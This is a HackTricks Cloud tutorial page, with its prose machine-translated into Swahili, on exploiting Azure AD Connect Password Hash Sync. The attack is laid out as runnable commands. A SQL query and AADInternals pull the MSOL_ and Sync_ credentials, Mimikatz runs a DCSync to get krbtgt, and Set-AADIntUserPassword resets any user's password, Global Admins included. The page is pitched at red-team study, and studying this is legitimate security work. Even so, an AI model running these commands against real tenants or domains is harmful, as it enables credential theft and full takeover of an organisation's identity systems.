Az - PHS - Password Hash Sync

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

From the docs: Sawa na usawazishaji wa hash ya nywila ni moja ya mbinu za kuingia zinazotumika kufanikisha utambulisho wa hybrid. Azure AD Connect inasawazisha hash, ya hash, ya nywila ya mtumiaji kutoka kwa mfano wa Active Directory wa ndani hadi mfano wa Azure AD wa msingi wa wingu.

Ni mbinu ya kawaida zaidi inayotumiwa na kampuni kusawazisha AD ya ndani na Azure AD.

Watumiaji wote na hash ya nywila za nywila husawazishwa kutoka kwa AD ya ndani hadi Azure AD. Hata hivyo, nywila za maandiko wazi au hashi za asili hazitumwi kwa Azure AD. Zaidi ya hayo, vikundi vya usalama vilivyojengwa ndani (kama wasimamizi wa kikoa...) havisawazishwi kwa Azure AD.

Usawazishaji wa hash hufanyika kila dakika 2. Hata hivyo, kwa kawaida, kuisha kwa nywila na kuisha kwa akaunti hakusawazishwi katika Azure AD. Hivyo, mtumiaji ambaye nywila yake ya ndani imeisha (haijabadilishwa) anaweza kuendelea kupata rasilimali za Azure akitumia nywila ya zamani.

Wakati mtumiaji wa ndani anapotaka kupata rasilimali ya Azure, uthibitishaji hufanyika kwenye Azure AD.

PHS inahitajika kwa vipengele kama Ulinzi wa Utambulisho na Huduma za Kikoa za AAD.

Pivoting

Wakati PHS imewekwa, akaunti za kipaumbele zinaanzishwa kiotomatiki:

Akaunti MSOL_<installationID> inaanzishwa kiotomatiki katika AD ya ndani. Akaunti hii inapewa jukumu la Akaunti za Usawazishaji wa Katalogi (tazama nyaraka) ambayo inamaanisha kwamba ina idhini za kuiga (DCSync) katika AD ya ndani.
Akaunti Sync_<name of on-prem ADConnect Server>_installationID inaanzishwa katika Azure AD. Akaunti hii inaweza kurekebisha nywila ya MTUMIAJI YOYOTE (iliyowekwa sawa au ya wingu pekee) katika Azure AD.

Nywila za akaunti hizo mbili za kipaumbele zinahifadhiwa katika seva ya SQL kwenye seva ambapo Azure AD Connect imewekwa. Wasimamizi wanaweza kutoa nywila za watumiaji hao wa kipaumbele kwa maandiko wazi. Hifadhidata iko katika C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf.

Inawezekana kutoa usanidi kutoka moja ya meza, ikiwa moja imefichwa:

SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;

Usanidi uliofichwa umefichwa kwa DPAPI na unajumuisha nywila za mtumiaji MSOL_* katika AD ya ndani na nywila ya Sync_* katika AzureAD. Hivyo, kuathiri hizi inawezekana kupandisha hadhi hadi AD na AzureAD.

Unaweza kupata muonekano kamili wa jinsi akreditivu hizi zinavyohifadhiwa na kufichuliwa katika mazungumzo haya.

Finding the Azure AD connect server

Ikiwa seva ambapo Azure AD connect imewekwa imeunganishwa na kikoa (iliyopendekezwa katika nyaraka), inawezekana kuipata kwa:

# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" - Properties * | select SamAccountName,Description | fl

#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

Kutumia MSOL_*

# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Get-AADIntSyncCredentials

# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'

Unaweza pia kutumia adconnectdump kupata hizi akauti.

Kutumia Sync_*

Kuharibu akaunti ya Sync_* inawezekana kurekebisha nenosiri la mtumiaji yeyote (ikiwemo Wasimamizi wa Kimataifa)

# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the users password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)

Ni pia inawezekana kubadilisha nywila za watumiaji wa wingu tu (hata kama hiyo siyo ya kutarajia)

# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers

Ni uwezekano wa kutoa nenosiri la mtumiaji huyu.

Chaguo lingine lingekuwa kutoa ruhusa za kipaumbele kwa huduma ya msingi, ambayo mtumiaji wa Sync ana ruhusa ya kufanya, na kisha kufikia huduma hiyo ya msingi kama njia ya privesc.

Seamless SSO

Ni uwezekano wa kutumia Seamless SSO na PHS, ambayo inakabiliwa na matumizi mengine mabaya. Angalia katika:

Marejeleo

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAz - Federation NextAz - PTA - Pass-through Authentication

Last updated 8 days ago